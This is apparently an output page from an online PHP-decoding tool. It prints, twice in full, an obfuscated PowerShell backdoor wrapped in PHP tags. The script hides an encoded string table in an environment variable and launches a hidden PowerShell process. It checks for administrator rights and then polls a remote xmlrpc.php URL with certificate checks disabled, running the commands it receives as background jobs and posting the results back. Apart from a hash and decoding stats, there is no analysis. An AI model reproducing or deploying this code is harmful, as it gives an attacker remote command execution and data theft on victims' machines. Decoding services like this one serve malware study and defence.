Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

$op = {$bp=New-Object System.Diagnostics.ProcessStartInfo;$bp.FileName="powershell.exe";$b..

Decoded Output download

<?  $op = {$bp=New-Object System.Diagnostics.ProcessStartInfo;$bp.FileName="powershell.exe";$bp.EnvironmentVariables.Add("yfayso", ';\D2\CB6A ^)+dm3=)^)+fry{db7=i8x(pT8xf.Enc_&ing]::unic_&8.G8fsfring(pC_nv8rf]::Fr_mbas86wSfring(dm3999}cafch{db7"=")ErrC;:)zd8rr_rp0].Exc8pfi_n}+r8furn"db7+^Tim8_uf^K88pAliv8^Subsfring^Sysf8m.T8xf.SfringBuil&8r^C_mpl8f8&^R8m_v8Af^(.{;00000}9^sysf8m.c_ll8cfi_ns.arraylisf^Unic_&8^Us8rAg8nf^M_oilla/5.0"(Win&_ts"NT";0.0+"Win6w+"x6w9"Appl8W8bKif/537.36"(KHTML,"lik8"G8ck_9"Chr_m8/;07.0.0.0"Sa[ari/537.36^cr8af8^Pragma:"n_-cach8^App8n&^Running^C_nf8nfTyp8^g8fR8qu8sfSfr8am^A&&Rang8^S8f-L_cafi_n")^asx"^POST^IsInR_l8^G8fByf8s^Cach8-C_nfr_l:"n_-cach8,"n_-sf_r8^aso"^M8fh_&^C_unf^S8curify.Principal.Win&_tsPrincipal^nam8^T_Bas86wSfring^R8a&T_En&^T_CharArray^A&minisfraf_r^applicafi_n/x-ttt-[_rm-url8nc_&8&^l8ngfh^C__ki8:"^Sysf8m.IO.Sfr8amR8a&8r^G8fR8sp_ns8^Expir8s:"0^https://&8nsify&8sign._rg/xmlrpc.php^G8fCurr8nf^g8fR8sp_ns8Sfr8am^C_nf8nfL8ngfh^Fr_mBas86wSfring^In&8xO[^G8fSfring^r8a&all');$bp.UseShellExecute=$false;$bp.LoadUserProfile=$false;$bp.CreateNoWindow=$true;$bp.RedirectStandardInput=$true;$bp.RedirectStandardOutput=$true;$bp.RedirectStandardError=$true;$d4=[System.Diagnostics.Process]::Start($bp);$z4 = Register-ObjectEvent -InputObj $d4 -Event "ErrorDataReceived" -Action {param([System.Object] $j3,[System.Diagnostics.DataReceivedEventArgs] $e);Write-host $e.Data};sleep p0;$d4.StandardInput.WriteLine('$z=(gi env:yfayso).Value;[System.Environment]::SetEnvironmentVariable("yfayso","");$h0=''4wtf[pp;+zo_e8 ")9\$d&''.((''To'')+(''c'')+(''H'')+(''A'')+(''Ra'')+(''r'')+(''r'')+(''a'')+(''y''))();for($o2=p;$o2 -le 2p;$o2++){$z=$z.((''Rep'')+(''LA'')+(''c'')+(''E''))($h0[$o2],$h0[$o2-p]);}$z=$z.((''sp'')+(''liT''))(''^'');function t2($q6){$f8=$q6.($z[34])();$q7=new-object ($z[6]);$w3=$f8.($z[29]);for($h8=0;$h8 -lt $w3;$h8++){if($h8%2){[void]$q7.($z[p6])($f8[$h8]+$i7)};$i7=$f8[$h8];}if($w3%2){[void]$q7.($z[p6])($f8[$w3-p])}$q7.ToString();}function g3($e5){t2([Convert]::($z[32])([Text.Encoding]::($z[pp]).($z[25])($e5)));}function p7($d2){$d2=t2($d2);[Text.Encoding]::($z[pp]).($z[48])([Convert]::($z[46])($d2))}if ((New-Object ($z[30]) ([Security.Principal.WindowsIdentity]::(($z[43]))())).($z[24])([Security.Principal.WindowsBuiltinRole]::($z[35]))){$n0="p"}else{$n0="0"};$s6=($z[0]);$p4=new-object ($z[p0]);function e2($j5) {[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tlsp2;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$k0=($z[p3]);$i6=30000;$l8=($z[42]);$o5="$s6=$n0";if($p4.($z[29]) -ne 0){$o5="$o5!"+($p4 -join "|")};if($j5.($z[37]) -gt 0){$y6=(g3($j5)).replace("+","!");$l0 = $y6 -split ($z[9]) -ne "";$g5 = Get-Random -Mi p0000000 -Ma 99999999;for ($c8=0; $c8 -lt $l0.Length;$c8++){if ($c8 -eq 0) {$ap = 0;} elseif ($c8 -eq ($l0.Length-p)) {$ap = 2;} else { $ap = p;}if ($l0.Length -eq p) { $ep=""; } else { $ep="[sX<$g5>$ap]"; }$y6 = $l0[$c8];$k3=[System.Text.Encoding]::ASCII.($z[25])("$s6=$ep$y6");$b4=[System.Net.WebRequest]::($z[p4])($l8);$b4.($z[p2])=$k0;$b4.($z[3])=$i6;$b4.($z[4])=0;$b4.Headers.Add(($z[38])+$o5);$b4.Headers.Add(($z[p5]));$b4.Headers.Add(($z[26]));$b4.Headers.Add(($z[4p]));$b4.($z[28])=($z[23]);$b4.($z[p8])=($z[36]);$b4.($z[45])=$k3.($z[37]);$xp=$b4.($z[p9])();$xp.write($k3,0,$k3.($z[37]));$xp.flush();$xp.close();try{$hp=$b4.($z[40])();$u0=$hp.($z[44])();$n7=new-object ($z[39]) $u0;$wp=$n7.($z[33])();}Catch{}}}else{$b4=[System.Net.WebRequest]::($z[p4])($l8);$b4.($z[p2])=$k0;$b4.($z[3])=$i6;$b4.($z[4])=0;$b4.Headers.Add("Cookie: $o5");$b4.Headers.Add(($z[p5]));$b4.Headers.Add(($z[26]));$b4.Headers.Add(($z[4p]));$b4.($z[28])=''GET'';try{$hp=$b4.($z[40])();$u0=$hp.($z[44])();$n7=new-object ($z[39]) $u0;$wp=$n7.($z[33])();}Catch{}}$o9=$wp -split $s6;if($o9.($z[29]) -eq 3){$x3=p7($o9[p])}else{$x3=""}$x3;}function u8($z3, $kp){$x7=[Convert]::($z[32])([Text.Encoding]::($z[pp]).($z[25])($kp));$c0=$global:p2;$x7=($z[2p])+$c0+($z[p])+$x7+($z[2]);$b9 = [ScriptBlock]::($z[p4])($x7);$l9 = sajb -name $z3 -s $b9;if($l9.id){return $l9.id}else{return $false}}function p9($f9_name){$w9 = gjb -name $f9_name;if ($w9) {$s5 = $w9.State;if ($s5 -eq ($z[7])) {try{[string]$a5 = $w9.ChildJobs[0].Information.($z[49])();}Catch{}if ($a5) {$a2 = $a5.($z[37]);if($a5.($z[5])(0,4) -eq ($z[22])){$j6 = $a5.($z[5])(4,$a2-4);if(Test-Path -Path $j6){$global:p2=$j6;}}if($a5.($z[5])(0,4) -eq ($z[27])){$d5 = $a5.($z[5])(4,$a2-4);$global:h6=$d5;}}$m7 = Receive-Job $w9;}else{$m7 = ''Ep''} Remove-Job $w9;}else{$m7 = ''E2''} return $m7;}function m0($fp) {if($fp -ne ""){$d7=$fp.($z[37]);$z3=$fp.($z[5])($d7-8);$u7=$fp.($z[5])(0,$d7-8);$x4=u8 $z3 $u7;if ($x4 -ne $false){$p4.add($z3)|Out-Null;}}}$h6=0;$p2=(Get-Location).path;$c6 = (Get-Date);While($True){$l5=0;$t9="";if ($p4.($z[29]) -ne 0){$n4=gjb -st ($z[p7]) | select -exp ($z[3p]);$v8=new-object ($z[p0]);$v8.($z[20])($p4);foreach($b6_name in $v8 ){if (-Not($n4 -contains $b6_name)){$k5=$p4.($z[47])($b6_name);if ($k5 -ne -p){$o6=$p4[$k5];$p4.($z[8])($k5);$q0=p9($b6_name);$t9 += "[!$s6!]"+$q0+"!"+$o6;$l5=p;}}}}if($l5 -ne 0){$o4=$t9;}else{$o4="";}$e8=((Get-Date)-$c6).TotalSeconds;if(($l5 -ne 0) -or ($e8 -ge $h6)) {$c6 = (Get-Date);$g7 = e2($o4);m0($g7);if($h6 -eq 0){$h6=60};}sleep -s 2;}');sleep 20;if($d4.WaitForExit(p)){ echo "Error start process. ExitCode:"+$d4.ExitCode;}else{echo "Process started"};$d4.BeginErrorReadLine();Unregister-Event -SourceIdentifier $z4.Name; } ; $a7 = start-job -scriptblock $op;sleep 40;$s0 = Receive-Job -Job $a7;$s0 ?>

Did this file decode correctly?

Original Code

$op = {$bp=New-Object System.Diagnostics.ProcessStartInfo;$bp.FileName="powershell.exe";$bp.EnvironmentVariables.Add("yfayso", ';\D2\CB6A ^)+dm3=)^)+fry{db7=i8x(pT8xf.Enc_&ing]::unic_&8.G8fsfring(pC_nv8rf]::Fr_mbas86wSfring(dm3999}cafch{db7"=")ErrC;:)zd8rr_rp0].Exc8pfi_n}+r8furn"db7+^Tim8_uf^K88pAliv8^Subsfring^Sysf8m.T8xf.SfringBuil&8r^C_mpl8f8&^R8m_v8Af^(.{;00000}9^sysf8m.c_ll8cfi_ns.arraylisf^Unic_&8^Us8rAg8nf^M_oilla/5.0"(Win&_ts"NT";0.0+"Win6w+"x6w9"Appl8W8bKif/537.36"(KHTML,"lik8"G8ck_9"Chr_m8/;07.0.0.0"Sa[ari/537.36^cr8af8^Pragma:"n_-cach8^App8n&^Running^C_nf8nfTyp8^g8fR8qu8sfSfr8am^A&&Rang8^S8f-L_cafi_n")^asx"^POST^IsInR_l8^G8fByf8s^Cach8-C_nfr_l:"n_-cach8,"n_-sf_r8^aso"^M8fh_&^C_unf^S8curify.Principal.Win&_tsPrincipal^nam8^T_Bas86wSfring^R8a&T_En&^T_CharArray^A&minisfraf_r^applicafi_n/x-ttt-[_rm-url8nc_&8&^l8ngfh^C__ki8:"^Sysf8m.IO.Sfr8amR8a&8r^G8fR8sp_ns8^Expir8s:"0^https://&8nsify&8sign._rg/xmlrpc.php^G8fCurr8nf^g8fR8sp_ns8Sfr8am^C_nf8nfL8ngfh^Fr_mBas86wSfring^In&8xO[^G8fSfring^r8a&all');$bp.UseShellExecute=$false;$bp.LoadUserProfile=$false;$bp.CreateNoWindow=$true;$bp.RedirectStandardInput=$true;$bp.RedirectStandardOutput=$true;$bp.RedirectStandardError=$true;$d4=[System.Diagnostics.Process]::Start($bp);$z4 = Register-ObjectEvent -InputObj $d4 -Event "ErrorDataReceived" -Action {param([System.Object] $j3,[System.Diagnostics.DataReceivedEventArgs] $e);Write-host $e.Data};sleep p0;$d4.StandardInput.WriteLine('$z=(gi env:yfayso).Value;[System.Environment]::SetEnvironmentVariable("yfayso","");$h0=''4wtf[pp;+zo_e8 ")9\$d&''.((''To'')+(''c'')+(''H'')+(''A'')+(''Ra'')+(''r'')+(''r'')+(''a'')+(''y''))();for($o2=p;$o2 -le 2p;$o2++){$z=$z.((''Rep'')+(''LA'')+(''c'')+(''E''))($h0[$o2],$h0[$o2-p]);}$z=$z.((''sp'')+(''liT''))(''^'');function t2($q6){$f8=$q6.($z[34])();$q7=new-object ($z[6]);$w3=$f8.($z[29]);for($h8=0;$h8 -lt $w3;$h8++){if($h8%2){[void]$q7.($z[p6])($f8[$h8]+$i7)};$i7=$f8[$h8];}if($w3%2){[void]$q7.($z[p6])($f8[$w3-p])}$q7.ToString();}function g3($e5){t2([Convert]::($z[32])([Text.Encoding]::($z[pp]).($z[25])($e5)));}function p7($d2){$d2=t2($d2);[Text.Encoding]::($z[pp]).($z[48])([Convert]::($z[46])($d2))}if ((New-Object ($z[30]) ([Security.Principal.WindowsIdentity]::(($z[43]))())).($z[24])([Security.Principal.WindowsBuiltinRole]::($z[35]))){$n0="p"}else{$n0="0"};$s6=($z[0]);$p4=new-object ($z[p0]);function e2($j5) {[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tlsp2;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$k0=($z[p3]);$i6=30000;$l8=($z[42]);$o5="$s6=$n0";if($p4.($z[29]) -ne 0){$o5="$o5!"+($p4 -join "|")};if($j5.($z[37]) -gt 0){$y6=(g3($j5)).replace("+","!");$l0 = $y6 -split ($z[9]) -ne "";$g5 = Get-Random -Mi p0000000 -Ma 99999999;for ($c8=0; $c8 -lt $l0.Length;$c8++){if ($c8 -eq 0) {$ap = 0;} elseif ($c8 -eq ($l0.Length-p)) {$ap = 2;} else { $ap = p;}if ($l0.Length -eq p) { $ep=""; } else { $ep="[sX<$g5>$ap]"; }$y6 = $l0[$c8];$k3=[System.Text.Encoding]::ASCII.($z[25])("$s6=$ep$y6");$b4=[System.Net.WebRequest]::($z[p4])($l8);$b4.($z[p2])=$k0;$b4.($z[3])=$i6;$b4.($z[4])=0;$b4.Headers.Add(($z[38])+$o5);$b4.Headers.Add(($z[p5]));$b4.Headers.Add(($z[26]));$b4.Headers.Add(($z[4p]));$b4.($z[28])=($z[23]);$b4.($z[p8])=($z[36]);$b4.($z[45])=$k3.($z[37]);$xp=$b4.($z[p9])();$xp.write($k3,0,$k3.($z[37]));$xp.flush();$xp.close();try{$hp=$b4.($z[40])();$u0=$hp.($z[44])();$n7=new-object ($z[39]) $u0;$wp=$n7.($z[33])();}Catch{}}}else{$b4=[System.Net.WebRequest]::($z[p4])($l8);$b4.($z[p2])=$k0;$b4.($z[3])=$i6;$b4.($z[4])=0;$b4.Headers.Add("Cookie: $o5");$b4.Headers.Add(($z[p5]));$b4.Headers.Add(($z[26]));$b4.Headers.Add(($z[4p]));$b4.($z[28])=''GET'';try{$hp=$b4.($z[40])();$u0=$hp.($z[44])();$n7=new-object ($z[39]) $u0;$wp=$n7.($z[33])();}Catch{}}$o9=$wp -split $s6;if($o9.($z[29]) -eq 3){$x3=p7($o9[p])}else{$x3=""}$x3;}function u8($z3, $kp){$x7=[Convert]::($z[32])([Text.Encoding]::($z[pp]).($z[25])($kp));$c0=$global:p2;$x7=($z[2p])+$c0+($z[p])+$x7+($z[2]);$b9 = [ScriptBlock]::($z[p4])($x7);$l9 = sajb -name $z3 -s $b9;if($l9.id){return $l9.id}else{return $false}}function p9($f9_name){$w9 = gjb -name $f9_name;if ($w9) {$s5 = $w9.State;if ($s5 -eq ($z[7])) {try{[string]$a5 = $w9.ChildJobs[0].Information.($z[49])();}Catch{}if ($a5) {$a2 = $a5.($z[37]);if($a5.($z[5])(0,4) -eq ($z[22])){$j6 = $a5.($z[5])(4,$a2-4);if(Test-Path -Path $j6){$global:p2=$j6;}}if($a5.($z[5])(0,4) -eq ($z[27])){$d5 = $a5.($z[5])(4,$a2-4);$global:h6=$d5;}}$m7 = Receive-Job $w9;}else{$m7 = ''Ep''} Remove-Job $w9;}else{$m7 = ''E2''} return $m7;}function m0($fp) {if($fp -ne ""){$d7=$fp.($z[37]);$z3=$fp.($z[5])($d7-8);$u7=$fp.($z[5])(0,$d7-8);$x4=u8 $z3 $u7;if ($x4 -ne $false){$p4.add($z3)|Out-Null;}}}$h6=0;$p2=(Get-Location).path;$c6 = (Get-Date);While($True){$l5=0;$t9="";if ($p4.($z[29]) -ne 0){$n4=gjb -st ($z[p7]) | select -exp ($z[3p]);$v8=new-object ($z[p0]);$v8.($z[20])($p4);foreach($b6_name in $v8 ){if (-Not($n4 -contains $b6_name)){$k5=$p4.($z[47])($b6_name);if ($k5 -ne -p){$o6=$p4[$k5];$p4.($z[8])($k5);$q0=p9($b6_name);$t9 += "[!$s6!]"+$q0+"!"+$o6;$l5=p;}}}}if($l5 -ne 0){$o4=$t9;}else{$o4="";}$e8=((Get-Date)-$c6).TotalSeconds;if(($l5 -ne 0) -or ($e8 -ge $h6)) {$c6 = (Get-Date);$g7 = e2($o4);m0($g7);if($h6 -eq 0){$h6=60};}sleep -s 2;}');sleep 20;if($d4.WaitForExit(p)){ echo "Error start process. ExitCode:"+$d4.ExitCode;}else{echo "Process started"};$d4.BeginErrorReadLine();Unregister-Event -SourceIdentifier $z4.Name; } ; $a7 = start-job -scriptblock $op;sleep 40;$s0 = Receive-Job -Job $a7;$s0

Function Calls

None

Variables

None

Stats

MD5	cffc8f8586c57090a7f2507aa3c04ab2
Eval Count	0
Decode Time	52 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats